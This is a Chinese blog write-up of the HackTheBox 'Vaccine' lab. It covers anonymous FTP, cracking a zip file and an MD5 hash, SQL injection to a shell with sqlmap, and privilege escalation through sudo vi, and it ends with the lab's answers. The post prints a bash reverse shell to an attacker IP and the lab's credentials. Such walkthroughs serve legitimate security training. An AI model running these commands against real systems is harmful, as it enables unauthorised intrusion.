HackTheBox - Vaccine

最新推荐文章于 2023-11-14 17:33:34 发布
最新推荐文章于 2023-11-14 17:33:34 发布
阅读量921 收藏 1
点赞数
文章标签: 安全 web安全 php 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45862635/article/details/125333388
版权

信息收集 FTP匿名登录 暴力破解 sqlmap之getshell vi提权

一、端口扫描

使用nmap -A -T3 -v 10.129.171.0命令对靶机ip进行扫描

可以发现目标主机开发了ftp、ssh和http三个端口,其中ftp支持匿名模式登录,并且存在一个backup.zip文件
同时在网页中访问ip,存在一个登录界面

二、FTP匿名登录

接下来就使用ftp匿名登录目标靶机,在name处输入Anonymous,密码为空

通过dir命令发现存在一个backup.zip,使用get命令下载到本地

三、暴力破解压缩包

压缩包中存在index.php,使用弱密码尝试解压压缩包,发现行不通,那就需要用到爆破工具来爆破密码了
这时候会用到john的zip2john脚本,将加密压缩包的密码hash值导出到文件中,再用john对其进行爆破

用zip2john导出hash后,使用john和/usr/share/wordlists/目录下的rockyou.txt字典进行爆破,得到密码为741852963

使用密码解压得到index.php和style.css文件,这个index.php应该就是登录页面的源码了
打开index.php文件后可以发现存在一个判断语句,判断username是否等于admin以及密码的md5值是否等于2cb42f8734ea607eefed3b70af13bbd3

直接把md5值放到cmd5里去解密,得到密码qwerty789

四、GETSHELL

使用账户密码登录网站,可以看到一个表单,右上角有查询功能,尝试使用一下查询功能

可以发现在查询时使用了一个search的参数,可能存在sql注入漏洞,直接上sqlmap

sqlmap -u http://10.129.171.0/dashboard.php?search=zeus --cookie=PHPSESSID=075quf5khr2nf6k6k62m1p2m5j --os-shell --batch
//--cookie是指定页面cookie,否则页面就会跳转回登录页面
//--os-shell 使用sqlmap去getshell
// -batch 使用默认设置

成功getshell

但是可以看到命令执行结果的显示很别扭,为了我们后面更好地提取,我们先进行反弹shell
/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.92/4444 0>&1'
同时监听4444端口,成功反弹shell

在nmap的扫描结果中知道靶机用的是apache服务,那就可以去/var/www/html目录看下,发现有个dashboard.php
查看文件,在数据库连接语句中可以得到postgres的密码P@s5w0rd!

做到这一步的时候会发现在getshell之后,过一会会自动断开连接,在提权的时候会很麻烦,不过幸运的是我们拿到了postgres的密码,可以直接用ssh连上靶机 ssh postgres@{target_ip}

五、提权

使用sudo -l查看我们有哪些命令可以sudo使用

发现我们可以sudo使用vi编辑/etc/postgresql/11/main/pg_hba.conf文件,那么就可以用sudo提取

:set shell=/bin/bash
: shell

提取成功

vi提权具体可参考GTFOBins

六、答题

Besides SSH and HTTP, what other service is hosted on this box?
ftp

This service can be configured to allow login with any password for specific username. What is that username?
Anonymous

What is the name of the file downloaded over this service?
backup.zip

What script comes with the John The Ripper toolset and generates a hash from a password protected zip archive in a format to allow for cracking attempts?
zip2john

What is the password for the admin user on the website?
qwerty789

What option can be passed to sqlmap to try to get command execution via the sql injection?
–os-shell

What program can the postgres user run as root using sudo?
vi

Briyney
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试练习靶场hackthebox——Starting Point Vaccine攻略(内附各种bug解决方案)
TF0xn的博客
09-22 1984
目录连接配置扫描登录FTP破解压缩包密码登录网站SQL注入getshell(附bug解决办法)升级shell提权 连接配置 见这篇文章开始部分,在此不再赘述 扫描 根据给出的IP地址,使用nmap进行扫描 nmap -T4 -F 10.10.10.28 -T4:针对TCP端口禁止动态扫描延迟超过10ms -F:快速扫描,扫描一些常用端口 发现其开放了21、22和80端口,接下来我们用上一节最后部分获取到的ftp用户凭据ftpuser/mc@F1l3ZilL4登录ftp服务 登录FTP ftp 10.10
HackTheBox-Vaccine
LYJ20010728的博客
07-27 542
HackTheBox-Vaccine连接配置信息搜集登录FTP破解压缩包密码获取登录密码登录网站getshell升级shell提权 连接配置 参考之前写的连接配置,文章链接 信息搜集 使用nmap对场景给出的ip地址进行扫描 nmap -sS -A 10.10.10.46 发现其开放了21、22和80端口,利用上一场景得到的FTP用户凭据 ftpuser/mc@F1l3ZilL4,尝试登陆FTP服务 登录FTP ftp 10.10.10.46 Name:ftpuser Password:m
FTP批量验证工具333.zip
03-31
TP账号密码批量验证工具 导入账号密码,批量验证账号密码是否能链接 需要下载.net 才能运行,具体版本已经记不清了
Hack The Box 之 10 Vaccine
Angelxiqi的博客
05-07 485
一如既往的详细,给个好评呗~~
hack the box vaccine 靶场练习
鸥鹭忘机
08-01 1792
收集信息 连接hack the box服务器后第一步依然是扫描靶机。 nmap -sV -sS -F 10.10.10.46 -sV 代表扫描端口和开放的服务信息 -sS 代表用TCP半开式扫描 -F 快速扫描,扫描常用的端口 发现开放了80,21等端口。我们用上一个靶机获取到的账号和密码来连接一下这个ftp服务器,并查看一下有哪一些文件。 ftp 10.10.10.46 //然后更具提示输入账号和密码 ls 发现了一个backup.zip,把它下载下来并解压。 如果被防火墙拦截则可以开启被
HackTheBox-Starting Point--Tier 2---Vaccine
最新发布
七天
11-14 193
输出显示 postgres用户权限下,可以使用sudo权限编辑pg_hba.conf文件。2.FTP允许匿名登录,发现backup.zip。6.访问80端口,admin:qwerty789登录。7.搜索接口使用$searc变量,尝试对其进行注入。4.编辑pg_hba.conf获取shell。3.使用john解密backup.zip。4.backup.zip文件信息泄漏。爆破hash密码,得到密码是。,查看index.php,发现。参数获取一个shell。8.获取反弹shell。
Hack The Box - TIER 2 - Archetype Oopsie Vaccine Unified
Tajang的大千世界
03-08 2074
不想丸辣
nyc-vaccine-scraper
02-17
【nyc-vaccine-scraper】是一个使用JavaScript编写的程序,主要功能是针对纽约市的疫苗接种信息进行网络抓取和处理。在这个项目中,开发者利用Web Scraping技术从指定的网页上获取疫苗相关的实时数据,如疫苗库存、...
clean-vaccine
03-07
从压缩包文件名“clean-vaccine-master”来看,这可能代表项目的主分支,通常是开发的主要分支。在Git中,"master"分支是默认的,包含了最新的稳定代码。开发者通常会从这个分支创建新特性或修复bug的分支,然后合并...
NJ-Vaccine-TweetBot
03-10
【标题】"NJ-Vaccine-TweetBot" 是一个基于Python编程语言开发的项目,它主要用于自动发布关于新泽西州疫苗接种信息的推特。这个项目可能是为了帮助公众获取及时、准确的疫苗接种数据,提高公共卫生信息的传播效率。...
covid-vaccine-modeling
03-12
标题 "covid-vaccine-modeling" 暗示了这是一个关于使用Python进行COVID-19疫苗接种模拟的项目。在当前全球大流行的背景下,疫苗接种模型对于理解和预测疫苗接种策略的效果至关重要。这样的模型可以帮助政策制定者...
The Anti-Vaxxer Vaccine-crx插件
04-03
语言:English (United States) 抗vaxxer疫苗是第一个数字疫苗,旨在在线对抗抗缅婆婆婆的传播。 抗vaxxerism几乎只有疫苗。 但它从未像今天那样毒力和危险,导致疫苗接种率下降,疾病爆发和死亡。...
靶机渗透练习15-Hackable II
hirak0的博客
04-15 979
靶机描述 靶机地址:https://www.vulnhub.com/entry/hackable-ii,711/ Description difficulty: easy This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.6 注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式) 该靶机环境搭建如
shell中使用ftp登陆服务器get文件
架构师实战感悟
10-13 2297
在shell脚本中也可以使用expect工具+ftp工具登陆服务器,也可以直接使用ftp工具: #!/bin/sh ftp -v -n open  ip_address user username password             #用户名和密码使用空格分开 cd  /home get data.tar.gz EOF echo "get data successf
后台接收数组_代码审计之某系统后台存在GetShell
weixin_39859819的博客
11-21 67
本文作者:霾团队交流群:673441920-----------------------------------------------------------前言POC镇楼!!!http://www.xxx.xxx/index.php?admin_filemanager-uploadfile漏洞演示过程:首先我们利用D盾去监听下当前项目目录。然后我们在后台文件管理上传一个木马。然后我们在点击上传...
shell脚本实现ftp上传下载文件
qq_49849300的博客
06-05 3582
【代码】shell脚本实现ftp上传下载文件。
ftp获取文件 shell
hi,你好鸭。
10-13 919
#!/bin/sh host="test.com" user="test" pwd="111" fileName=test_$(date +%Y%m%d).txt if [ ! -f "$fileName" ]; then ftp -i -n $host<<EOF user $user $pwd binary cd /home/data/ lcd ./ get test.txt test.txt bye EOF if [ -f te
FTP匿名登录
山兔的博客
10-28 4177
从一个服务到另一个服务的目标。凭据可能会丢失在可公开访问的文件夹中的某个位置,这将允许我们通过一个远程shell登录,该shell不受监控。配置错误的服务可能会泄露信息,使我们能够模拟受害者的数字身份。现实世界中存在许多可能性。然而,我们将从一些简单的开始。处理一个从其他两个目标拼凑而成的例子,我们将看到一个不安全的FTP上的访问配置和网站的管理登录。让我们继续解构这个矢量及其分量分析。
Hack the box vaccine
qq_41696858的博客
07-03 219
上一台靶机的线索FTP账号 ftpuser/mc@F1l3ZilL4 1.日常nmap -sC -sV 10.10.10.46,开放21,22,80端口 2.结合上一台靶机拿到的FTP账号,密码,登录FTP服务器,dir看到backup.zip,拿到备份文件 3.解密,用kali里面的john 先用zip2john backup.zip>hash //生成hash值,解密效率更高 john hash --fork=4 -w /usr/share/wordlists/rockyou.txt 2&gt
foreach ($list as $key => &$row) { $row->visible(['id', 'do_time', 'sheep_list', 'factory', 'remark', 'farms', 'animal', 'vaccine']); $row->getRelation('farms')->visible(['id', 'name']); $row->getRelation('animal')->visible(['tag_code', 'short_code']); $row->getRelation('vaccine')->visible(['id', 'vaccine_id', 'name']); $row['vaccine']['name'] = Db::name("farm_vaccine") ->where('id', $row['vaccine']['vaccine_id']) ->value("name"); }解析
06-09
具体来说,对于每一个列表中的元素,将其可见的属性设置为 id、do_time、sheep_list、factory、remark、farms、animal 和 vaccine,同时对于 farms、animal 和 vaccine 这三个关联模型,也设置其可见的属性。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值